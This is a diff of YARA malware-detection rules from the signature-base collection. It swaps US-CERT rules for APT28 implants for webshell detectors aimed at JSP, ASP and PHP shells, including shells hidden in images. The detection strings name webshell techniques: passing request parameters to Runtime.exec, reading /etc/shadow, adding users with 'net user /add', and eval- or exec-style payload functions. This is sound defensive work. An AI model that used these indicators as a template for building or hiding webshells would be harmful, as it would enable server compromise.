-         81 3A 1D B9 A8 02 BD 3A E6 E0 FA 4D A9 07 5B E6 }
+		$sj0 = /\{ ?47, 98, 105, 110, 47, 98, 97, 115, 104/ wide ascii
+		$sj1 = /\{ ?99, 109, 100}/ wide ascii
+		$sj2 = /\{ ?99, 109, 100, 46, 101, 120, 101/ wide ascii
+		$sj3 = /\{ ?47, 98, 105, 110, 47, 98, 97/ wide ascii
+		$sj4 = /\{ ?106, 97, 118, 97, 46, 108, 97, 110/ wide ascii
+		$sj5 = /\{ ?101, 120, 101, 99 }/ wide ascii
+		$sj6 = /\{ ?103, 101, 116, 82, 117, 110/ wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and any of them
+		filesize < 300KB and any of ( $sj* )
 }
-rule SIGNATURE_BASE_IMPLANT_2_V20 : FILE
+rule SIGNATURE_BASE_WEBSHELL_JSP_Netspy : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "323ee676-802d-55e6-a97a-48eb3a4e4a5f"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L406-L423"
+		description = "JSP netspy webshell"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "41f5c171-878d-579f-811d-91d74f7e3e24"
+		date = "2021-01-24"
+		modified = "2024-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L6196-L6262"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "72c62a764c5c7c19a07957fd6fbfcffd689900cc2759d408d239fe08a3b76b9c"
-		score = 85
-		quality = 85
+		hash = "94d1aaabde8ff9b4b8f394dc68caebf981c86587"
+		hash = "3870b31f26975a7cb424eab6521fc9bffc2af580"
+		logic_hash = "65432e42ad2626b62b1d1a6298c301513c2fb03d89193a77b053069cebcb45e9"
+		score = 75
+		quality = 1
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$func = { 0F B6 5C 0A FE 8D 34 02 8B 45 D4 03 C2 0F AF D8 8D 7A 01 8D 42
-         FF 33 D2 F7 75 F4 C1 EB 07 8B C7 32 1C 0A 33 D2 B9 06 00 00 00 F7 F1
-         8A 4D F8 8B 45 0C 80 E9 02 02 4D 0B 32 0C 02 8B 45 F8 33 D2 F7 75 F4
-         8B 45 0C 22 0C 02 8B D7 02 D9 30 1E 8B 4D 0C 8D 42 FE 3B 45 E8 8B 45
-         D8 89 55 F8 72 A0 }
+		$scan1 = "scan" nocase wide ascii
+		$scan2 = "port" nocase wide ascii
+		$scan3 = "web" fullword nocase wide ascii
+		$scan4 = "proxy" fullword nocase wide ascii
+		$scan5 = "http" fullword nocase wide ascii
+		$scan6 = "https" fullword nocase wide ascii
+		$write1 = "os.write" fullword wide ascii
+		$write2 = "FileOutputStream" fullword wide ascii
+		$write3 = "PrintWriter" fullword wide ascii
+		$http = "java.net.HttpURLConnection" fullword wide ascii
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
+		$cjsp_long7 = "< %" ascii wide
+		$input1 = "getParameter" fullword ascii wide
+		$input2 = "getHeaders" fullword ascii wide
+		$input3 = "getInputStream" fullword ascii wide
+		$input4 = "getReader" fullword ascii wide
+		$req1 = "request" fullword ascii wide
+		$req2 = "HttpServletRequest" fullword ascii wide
+		$req3 = "getRequest" fullword ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		filesize < 30KB and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( any of ( $input* ) and any of ( $req* ) ) and 4 of ( $scan* ) and 1 of ( $write* ) and $http
 }
-rule SIGNATURE_BASE_IMPLANT_3_V1
+rule SIGNATURE_BASE_WEBSHELL_JSP_By_String : FILE
 {
 	meta:
-		description = "X-Agent/CHOPSTICK Implant by APT28"
-		author = "US CERT"
-		id = "d539bb31-18b2-5cf5-b994-daecd5f8c771"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L425-L442"
+		description = "JSP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions."
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8d64e40b-5583-5887-afe1-b926d9880913"
+		date = "2021-01-09"
+		modified = "2025-08-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L6264-L6363"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4c7b6c76bc10784abf96cc71b34ffc9a9de569fd536505528752221d22b26629"
-		score = 85
-		quality = 85
-		tags = ""
+		hash = "e9060aa2caf96be49e3b6f490d08b8a996c4b084"
+		hash = "4c2464503237beba54f66f4a099e7e75028707aa"
+		hash = "06b42d4707e7326aff402ecbb585884863c6351a"
+		hash = "dada47c052ec7fcf11d5cfb25693bc300d3df87de182a254f9b66c7c2c63bf2e"
+		hash = "f9f6c696c1f90df6421cd9878a1dec51a62e91b4b4f7eac4920399cb39bc3139"
+		hash = "f1d8360dc92544cce301949e23aad6eb49049bacf9b7f54c24f89f7f02d214bb"
+		hash = "1d1f26b1925a9d0caca3fdd8116629bbcf69f37f751a532b7096a1e37f4f0076"
+		hash = "850f998753fde301d7c688b4eca784a045130039512cf51292fcb678187c560b"
+		logic_hash = "ab8d8df32ab745d8dd02d63d89264df2fbc0087daf6b4f91900ad03ab6e7949e"
+		score = 75
+		quality = 19
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$STR1 = ">process isn't exist<" ascii wide
-		$STR2 = "shell\\open\\command=\"System Volume Information\\USBGuard.exe\" install" ascii wide
-		$STR3 = "User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0" ascii wide
-		$STR4 = "webhp?rel=psy&hl=7&ai=" ascii wide
-		$STR5 = {0f b6 14 31 88 55 ?? 33 d2 8b c1 f7 75 ?? 8b 45 ?? 41 0f b6 14
-         02 8a 45 ?? 03 fa}
+		$jstring1 = "<title>Boot Shell</title>" wide ascii
+		$jstring2 = "String oraPWD=\"" wide ascii
+		$jstring3 = "Owned by Chinese Hackers!" wide ascii
+		$jstring4 = "AntSword JSP" wide ascii
+		$jstring5 = "JSP Webshell</" wide ascii
+		$jstring6 = "motoME722remind2012" wide ascii
+		$jstring7 = "EC(getFromBase64(toStringHex(request.getParameter(\"password" wide ascii
+		$jstring8 = "http://jmmm.com/web/index.jsp" wide ascii
+		$jstring9 = "list.jsp = Directory & File View" wide ascii
+		$jstring10 = "jdbcRowSet.setDataSourceName(request.getParameter(" wide ascii
+		$jstring11 = "Mr.Un1k0d3r RingZer0 Team" wide ascii
+		$jstring12 = "MiniWebCmdShell" fullword wide ascii
+		$jstring13 = "pwnshell.jsp" fullword wide ascii
+		$jstring14 = "session set &lt;key&gt; &lt;value&gt; [class]<br>" wide ascii
+		$jstring15 = "Runtime.getRuntime().exec(request.getParameter(" nocase wide ascii
+		$jstring16 = "GIF98a<%@page" wide ascii
+		$jstring17 = "Tas9er" fullword wide ascii
+		$jstring18 = "uu0028\\u" wide ascii
+		$jstring19 = "uu0065\\u" wide ascii
+		$jstring20 = "uu0073\\u" wide ascii
+		$jstring21 = /\\uuu{0,50}00/ wide ascii
+		$jstring22 = /[\w\.]\\u(FFFB|FEFF|FFF9|FFFA|200C|202E|202D)[\w\.]/ wide ascii
+		$jstring23 = "\"e45e329feb5d925b\"" wide ascii
+		$jstring24 = "u<![CDATA[n" wide ascii
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
+		$cjsp_long7 = "< %" ascii wide
+		$dex1 = "dex\n0"
+		$dex2 = "dey\n0"
+		$pack = { 50 41 43 4b 00 00 00 02 00 }
 
 	condition:
-		any of them
+		not ( uint16( 0 ) == 0x5a4d or $dex1 at 0 or $dex2 at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and ( ( filesize < 100KB and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and any of ( $jstring* ) ) or ( filesize < 500KB and ( #jstring21 > 20 or $jstring18 or $jstring19 or $jstring20 ) ) )
 }
-rule SIGNATURE_BASE_IMPLANT_3_V2 : FILE
+rule SIGNATURE_BASE_WEBSHELL_JSP_Input_Upload_Write : FILE
 {
 	meta:
-		description = "X-Agent/CHOPSTICK Implant by APT28"
-		author = "US CERT"
-		id = "349c65cf-547f-5837-af71-f9721e029b74"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L444-L464"
+		description = "JSP uploader which gets input, writes files and contains \"upload\""
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "bbf26edd-88b7-5ec5-a16e-d96a086dcd19"
+		date = "2021-01-24"
+		modified = "2024-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L6365-L6425"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0a658888dcc7b7f4620f08449c6ec492756750e64f15b048f7cdee7de4fc0479"
-		score = 85
-		quality = 85
+		hash = "ef98ca135dfb9dcdd2f730b18e883adf50c4ab82"
+		hash = "583231786bc1d0ecca7d8d2b083804736a3f0a32"
+		hash = "19eca79163259d80375ebebbc440b9545163e6a3"
+		logic_hash = "33b08a6118134819ec72a2eab0daf723c25c8869e0fa8a83f690b93e2667d15c"
+		score = 75
+		quality = 46
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$base_key_moved = {C7 45 ?? 3B C6 73 0F C7 45 ?? 8B 07 85 C0 C7 45 ?? 74
-         02 FF D0 C7 45 ?? 83 C7 04 3B C7 45 ?? FE 72 F1 5F C7 45 ?? 5E C3 8B
-         FF C7 45 ?? 56 B8 D8 78 C7 45 ?? 75 07 50 E8 C7 45 ?? B1 D1 FF FF C7
-         45 ?? 59 5D C3 8B C7 45 ?? FF 55 8B EC C7 45 ?? 83 EC 10 A1 66 C7 45
-         ?? 33 35}
-		$base_key_b_array = {3B C6 73 0F 8B 07 85 C0 74 02 FF D0 83 C7 04 3B FE
-         72 F1 5F 5E C3 8B FF 56 B8 D8 78 75 07 50 E8 B1 D1 FF FF 59 5D C3 8B
-         FF 55 8B EC 83 EC 10 A1 33 35 }
+		$upload = "upload" nocase wide ascii
+		$write1 = "os.write" fullword wide ascii
+		$write2 = "FileOutputStream" fullword wide ascii
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
+		$cjsp_long7 = "< %" ascii wide
+		$input1 = "getParameter" fullword ascii wide
+		$input2 = "getHeaders" fullword ascii wide
+		$input3 = "getInputStream" fullword ascii wide
+		$input4 = "getReader" fullword ascii wide
+		$req1 = "request" fullword ascii wide
+		$req2 = "HttpServletRequest" fullword ascii wide
+		$req3 = "getRequest" fullword ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and any of them
+		filesize < 10KB and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( any of ( $input* ) and any of ( $req* ) ) and $upload and 1 of ( $write* )
 }
-rule SIGNATURE_BASE_IMPLANT_3_V3 : FILE
+rule SIGNATURE_BASE_WEBSHELL_Generic_OS_Strings : FILE
 {
 	meta:
-		description = "X-Agent/CHOPSTICK Implant by APT28"
-		author = "US CERT"
-		id = "ce82511e-715a-53cb-98e5-5d51b94726d5"
-		date = "2017-02-10"
-		modified = "2021-03-15"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L466-L485"
+		description = "typical webshell strings"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ea85e415-4774-58ac-b063-0f5eb535ec49"
+		date = "2021-01-12"
+		modified = "2024-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L6427-L6596"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "313f837b90bcf09455427e4411acb5406f4dae9d69373d8d2c0cfc014e27ee96"
-		score = 65
-		quality = 85
+		hash = "d5bfe40283a28917fcda0cefd2af301f9a7ecdad"
+		hash = "fd45a72bda0a38d5ad81371d68d206035cb71a14"
+		hash = "b4544b119f919d8cbf40ca2c4a7ab5c1a4da73a3"
+		hash = "569259aafe06ba3cef9e775ee6d142fed6edff5f"
+		hash = "48909d9f4332840b4e04b86f9723d7427e33ac67"
+		hash = "0353ae68b12b8f6b74794d3273967b530d0d526f"
+		logic_hash = "10b956cac601c97d1483d35a7730d7178c4175800b4e4c9ed62ad583d3cac3d7"
+		score = 50
+		quality = -98
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$STR1 = ".?AVAgentKernel@@"
-		$STR2 = ".?AVIAgentModule@@"
-		$STR3 = "AgentKernel"
-		$fp1 = "Panda Security S.L." wide
+		$fp1 = "http://evil.com/" wide ascii
+		$fp2 = "denormalize('/etc/shadow" wide ascii
+		$fp3 = "vim.org>"
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
+		$cjsp_long7 = "< %" ascii wide
+		$w1 = "net localgroup administrators" nocase wide ascii
+		$w2 = "net user" nocase wide ascii
+		$w3 = "/add" nocase wide ascii
+		$l1 = "/etc/shadow" wide ascii
+		$l2 = "/etc/ssh/sshd_config" wide ascii
+		$take_two1 = "net user" nocase wide ascii
+		$take_two2 = "/add" nocase wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and 1 of ( $STR* ) and not 1 of ( $fp* )
+		filesize < 70KB and ( ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) or ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) or ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) ) and ( filesize < 300KB and not uint16( 0 ) == 0x5a4d and ( all of ( $w* ) or all of ( $l* ) or 2 of ( $take_two* ) ) ) and not any of ( $fp* )
 }
-rule SIGNATURE_BASE_IMPLANT_4_V1 : FILE
+rule SIGNATURE_BASE_WEBSHELL_In_Image : FILE
 {
 	meta:
-		description = "BlackEnergy / Voodoo Bear Implant by APT28"
-		author = "US CERT"
-		id = "be4d222f-009f-5dde-93da-376626a77263"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L487-L503"
+		description = "Webshell in GIF, PNG or JPG"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b1185b69-9b08-5925-823a-829fee6fa4cf"
+		date = "2021-02-27"
+		modified = "2024-03-11"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L6598-L6858"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "51135d9fe62f5fd1fb7ef6c386dcdd86525dd469064662c2314cfee6e952d6ec"
-		score = 85
-		quality = 85
+		hash = "d4fde4e691db3e70a6320e78657480e563a9f87935af873a99db72d6a9a83c78"
+		hash = "84938133ee6e139a2816ab1afc1c83f27243c8ae76746ceb2e7f20649b5b16a4"
+		hash = "52b918a64afc55d28cd491de451bb89c57bce424f8696d6a94ec31fb99b17c11"
+		logic_hash = "e7e78107c661aa5124a37b8e492986e5a3da63c79c97c4dc3199e648a5aa4aa8"
+		score = 55
+		quality = -167
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$STR1 = {55 8B EC 81 EC 54 01 00 00 83 65 D4 00 C6 45 D8 61 C6 45 D9 64
-         C6 45 DA 76 C6 45 DB 61 C6 45 DC 70 C6 45 DD 69 C6 45 DE 33 C6 45 DF
-         32 C6 45 E0 2EE9 ?? ?? ?? ??}
-		$STR2 = {C7 45 EC 5A 00 00 00 C7 45 E0
-            46 00 00 00 C7 45 E8 5A 00 00 00 C7 45 E4 46 00 00 00}
+		$png = { 89 50 4E 47 }
+		$jpg = { FF D8 FF E0 }
+		$gif = "GIF8" wide ascii
+		$gif2 = "gif89"
+		$gif3 = "Gif89"
+		$mdb = { 00 01 00 00 53 74 }
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
+		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload5 = /\bsystem[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
+		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
+		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
+		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
+		$m_cpayload_preg_filter2 = "'|.*|e'" nocase wide ascii
+		$php_multi_write1 = "fopen(" wide ascii
+		$php_multi_write2 = "fwrite(" wide ascii
+		$php_write1 = "move_uploaded_file" fullword wide ascii
+		$cjsp1 = "<%" ascii wide
+		$cjsp2 = "<jsp:" ascii wide
+		$cjsp3 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp4 = "/jstl/core" ascii wide
+		$payload1 = "ProcessBuilder" fullword ascii wide
+		$payload2 = "processCmd" fullword ascii wide
+		$rt_payload1 = "Runtime" fullword ascii wide
+		$rt_payload2 = "getRuntime" fullword ascii wide
+		$rt_payload3 = "exec" fullword ascii wide
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
+		$asp_payload0 = "eval_r" fullword nocase wide ascii
+		$asp_payload1 = /\beval\s/ nocase wide ascii
+		$asp_payload2 = /\beval\(/ nocase wide ascii
+		$asp_payload3 = /\beval\"\"/ nocase wide ascii
+		$asp_payload4 = /:\s{0,10}eval\b/ nocase wide ascii
+		$asp_payload8 = /\bexecute\s?\(/ nocase wide ascii
+		$asp_payload9 = /\bexecute\s[\w"]/ nocase wide ascii
+		$asp_payload11 = "WSCRIPT.SHELL" fullword nocase wide ascii
+		$asp_payload13 = "ExecuteGlobal" fullword nocase wide ascii
+		$asp_payload14 = "ExecuteStatement" fullword nocase wide ascii
+		$asp_payload15 = "ExecuteStatement" fullword nocase wide ascii
+		$asp_multi_payload_one1 = "CreateObject" nocase fullword wide ascii
+		$asp_multi_payload_one2 = "addcode" fullword wide ascii
+		$asp_multi_payload_one3 = /\.run\b/ wide ascii
+		$asp_multi_payload_two1 = "CreateInstanceFromVirtualPath" fullword wide ascii
+		$asp_multi_payload_two2 = "ProcessRequest" fullword wide ascii
+		$asp_multi_payload_two3 = "BuildManager" fullword wide ascii
+		$asp_multi_payload_three1 = "System.Diagnostics" wide ascii
+		$asp_multi_payload_three2 = "Process" fullword wide ascii
+		$asp_multi_payload_three3 = ".Start" wide ascii
+		$asp_multi_payload_four1 = "CreateObject" fullword nocase wide ascii
+		$asp_multi_payload_four2 = "TransformNode" fullword nocase wide ascii
+		$asp_multi_payload_four3 = "loadxml" fullword nocase wide ascii
+		$asp_multi_payload_five1 = "ProcessStartInfo" fullword nocase wide ascii
+		$asp_multi_payload_five2 = ".Start" nocase wide ascii
+		$asp_multi_payload_five3 = ".Filename" nocase wide ascii
+		$asp_multi_payload_five4 = ".Arguments" nocase wide ascii
+		$asp_always_write1 = /\.write/ nocase wide ascii
+		$asp_always_write2 = /\.swrite/ nocase wide ascii
+		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
+		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
+		$asp_cr_write1 = "CreateObject(" nocase wide ascii
+		$asp_cr_write2 = "CreateObject (" nocase wide ascii
